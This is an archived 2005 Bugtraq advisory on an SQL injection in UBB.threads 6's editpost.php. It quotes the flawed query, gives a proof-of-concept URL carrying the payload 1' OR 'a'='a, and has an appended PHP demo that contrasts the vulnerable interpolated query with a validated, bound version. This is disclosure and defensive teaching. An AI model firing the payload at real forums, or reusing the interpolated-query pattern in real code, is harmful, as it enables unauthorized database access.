UBB.threads 6 SQL Injection

kre0n_at_mail.ru
Date: 03/11/05

    Date: 11 Mar 2005 16:58:58 -0000
    To: bugtraq@securityfocus.com
    
    

    ADZ Security Team
    ===================
    Info

    Program: UBB.threads
    Version: 6
    Module: editpost.php
    Bug type: SQL Injection
    Vendor site: http://www.ubbcentral.com/ubbthreads/
    ===================
    Bug description

    In editpost.php we can see this code:
    // START
    $Cat = get_input("Cat","get");
    $Board = get_input("Board","get");
    $Number = get_input("Number","get");
    $page = get_input("page","get");
    $what = get_input("what","get");
    $vc = get_input("vc","get");
    // ...........
    $query = "
            SELECT
    B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky,
    B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear,
    B_AddSig,B_Board FROM {$config['tbprefix']}Posts
            WHERE B_Number = '$Number'
    ";
    //..........
    // END
    As we see, $Number is not checked to be an integer value, so... :)
    ===================
    Example/PoC:

    http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a
    ===================
    Contact

    ADZ Security Team // http://adz.void.ru/
    kreon // kre0n@mail.ru, adz.kreon@gmail.com
    ===================
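
The flaw described above and one way to close it, as an added example that is not UBB.threads code and not part of the original advisory: the interpolated query returns every row when given the PoC value of Number, while the validated and bound version rejects it. The in-memory SQLite table, its rows, and the function names fetch_interpolated and fetch_validated are assumptions made for illustration; PHP with the pdo_sqlite extension is assumed.

```php
<?php
// Added example: constructed table and rows, not the real UBB.threads schema.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE Posts (B_Number INTEGER PRIMARY KEY, B_Posterid INTEGER, B_Subject TEXT)");
$db->exec("INSERT INTO Posts VALUES (1, 10, 'first'), (2, 11, 'second'), (3, 12, 'third')");

// Pattern from the advisory: the request value is interpolated into the SQL string,
// so a quote in the value ends the string literal and the rest is parsed as SQL.
function fetch_interpolated(PDO $db, string $number): array
{
    $query = "SELECT B_Posterid, B_Subject FROM Posts WHERE B_Number = '$number'";
    return $db->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form (hypothetical helper): accept only a positive integer,
// then bind it as a typed parameter instead of building the SQL text from it.
function fetch_validated(PDO $db, string $number): array
{
    $n = filter_var($number, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        throw new InvalidArgumentException('Number must be a positive integer');
    }
    $stmt = $db->prepare('SELECT B_Posterid, B_Subject FROM Posts WHERE B_Number = :n');
    $stmt->bindValue(':n', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Value of the Number parameter in the advisory's PoC URL, URL-decoded.
$poc = "1' OR 'a'='a";

printf("interpolated, Number=1:   %d row(s)\n", count(fetch_interpolated($db, '1')));
printf("interpolated, PoC value:  %d row(s)\n", count(fetch_interpolated($db, $poc)));
printf("validated,    Number=1:   %d row(s)\n", count(fetch_validated($db, '1')));
try {
    fetch_validated($db, $poc);
} catch (InvalidArgumentException $e) {
    printf("validated,    PoC value:  rejected (%s)\n", $e->getMessage());
}
```

Validation and binding are both applied: the integer check rejects malformed input before it reaches the database, and the bound parameter keeps the value out of the SQL text even if a later change loosens the check.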

